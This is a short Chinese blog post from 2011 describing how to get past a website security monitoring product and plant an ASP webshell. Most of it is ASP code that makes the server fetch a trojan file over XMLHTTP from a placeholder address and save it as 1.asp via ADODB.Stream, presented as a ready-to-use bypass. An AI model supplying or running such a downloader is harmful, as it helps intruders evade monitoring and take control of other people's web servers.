绕过一流信息监控系统上传Webshell

用XMLHTTP 让服务器从空间里下载ASP木马并保存在服务器上,这样就能绕过去了
Set xPost = CreateObject(" Microsoft.XMLHTTP")
xPost.Open "GET","http://127.0.0.1/admin.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("1.asp"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载文件成功!<br>")

posted on 2011-02-24 06:20  =_=!  阅读(228)  评论(0编辑  收藏  举报

导航